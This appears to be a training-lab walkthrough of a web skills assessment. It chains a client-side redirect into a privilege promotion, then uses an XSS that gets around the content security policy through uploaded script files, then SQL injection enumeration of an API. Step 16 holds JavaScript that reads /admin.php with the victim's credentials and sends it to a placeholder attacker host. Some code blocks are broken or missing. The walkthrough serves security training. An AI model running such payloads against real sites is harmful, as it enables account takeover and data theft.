search

Skills Assessment

Question 1: Compromise the target machine.

  1. Enumerate all web applications on the target machine for XSS and CSRF vulnerabilities.

  2. Develop a robust exploit for any identified XSS or CSRF vulnerability.

  3. Execute the exploit to compromise the target machine and obtain the flag.

hashtag
Skills Assessment Questions

Question 1: Obtain the flag.

  1. Add the necessary vHosts to your /etc/hosts file:

    sudo sh -c 'echo "10.129.233.63 exploitserver.htb vulnerablesite.htb" >> /etc/hosts'

  2. Open Burp Suite, then open Firefox and browse to https://vulnerablesite.htb while intercepting the request. Forward the initial request, then forward the redirect to /login.php and inspect the server response. You may need to remove the Cookie: header before sending the request.

  3. Note that the server's content security policy is set to script-src 'self', HttpOnly and SameSite=Strict for cookies.

  4. Turn off Burp Suite's Intercept and log in to the vulnerable site (https://vulnerablesite.htb) using the credentials htb-stdnt:Academy_student!.

  5. Upon logging in, you will find links on the left-hand side of the page for Dashboard, File Management, User Management, Task Management, Admin Panel, and Logout.

  6. Go to User Management, then click the button Promote the htb-stdnt user.

  7. You will receive the message that "Only moderators and administrators can promote other users!". You need to find a way to have the victim moderator user perform the action of promoting the htb-stdnt user.

  8. Press the Logout button on the left-hand side of the page, and intercept it with Burp Suite.

  9. Forward the request, you will find the next request is to the endpoint /index.php?next=/login.php.

  10. Identifying a client-side redirect, craft a payload on the exploit server (https://exploitserver.htb) forcing the victim to visit this endpoint (modified to redirect to /users.php?userid=3 rather than /login.php, causing a promotion of the htb-stdnt user):

    <script>

document.location = "https://vulnerablesite.htb/index.php?next=/users.php%3fuserid=3"; 11. Save and then Deliver to Victim. Then, log back into the vulnerable site and check the User Management tab, confirming you have the moderator role. 12. With the moderator role, you are now able to add new tasks within the Task Management portion of the vulnerable site, creating an XSS attack vector against the administrator user, who frequently monitors the tasks. 13. Submitting the payload `<script>alert("1")</script>` as a new task will not execute inline javascript. You need to use the File Management page to upload a text file containing the javascript payload, then subsequently submit a payload to the Task Management page that references the text file as the script source. Create a file `alert.txt` with content `alert("1")`: bash echo 'alert("1")' > alert.txt 14. After selecting the `alert.txt` file and pressing Upload, click Access to view the text file along with its URL. 15. Return to Task Management, and add a task that references the uploaded text file as a script: html 16. Confirming the functionality of the XSS vulnerability, repeat this process, uploading a new text file containing a javascript payload to exfiltrate the contents of the Admin Panel (e.g., named `admin_panel.txt`): javascript var xhr = new XMLHttpRequest(); xhr.open('GET', '/admin.php', false); xhr.withCredentials = true; xhr.send();

var exfil = new XMLHttpRequest(); exfil.open("GET", "https://PWNIP:PWNPO/exfil?r=" + btoa(xhr.responseText), false); exfil.send(); ``` 17. Submit the new task. 18. After a few moments, check your exfiltration server to confirm data exfiltration. 19. Decode the Base64 encoded response, which will unveil the flag.

Students will proceed to decode the Base64 encoded response:

This script reveals the location of an API, https://api.vulnerablesite.htb/v1/customers.

Direct access to the customers endpoint is blocked. Therefore, use a brute-forcer to identify other endpoint(s) within the API:

Checking the exploit server, you will find two endpoints are returned. Decode these responses, identifying customer and customers endpoint:

Enumerate the customer endpoint further:

However, the API returns an error response, indicating a customer ID must be specified. You need to specify an ID:

By specifying an ID, you will see that you can successfully fetch customer information from the database.

Test for SQL injection against the customer endpoint:

The API returns the same response as before, confirming the injection vulnerability.

Modify your payload, using the ORDER BY function to discover the number of columns in the table being returned. Test for 3 columns:

The API successfully returns user data while ordering column 3.

However, when attempting to order by column 4, the API returns an error. Therefore, you will know that the table has 3 columns.

With this information, use UNION injection to further enumerate the database, beginning by enumerating the backend DBMS in use. Use the @@version payload to test for MySQL:

Decoding the response, you will confirm that the DBMS in use is MySQL.

Next, use the database() payload to find the current database:

Decoding the exfiltrated response, you will see the database is named db.

Knowing the name of the database, you now need to enumerate tables:

You will note that the API returns only one row of data, and only the files table is revealed.

Enumerate additional tables:

The customers table is returned next.

Continue the enumeration of tables:

The users table is returned next.

Continue the enumeration of tables:

The secretdata table is revealed.

Now, enumerate the columns present in the secretdata table:

The first column revealed is id.

Enumerate additional columns:

A second column, secretdata is now revealed.

Finally, query the contents of the secretdata column from the secretdata table:

PreviousXSS PreventionNextAbusing HTTP Misconfigurations

Last updated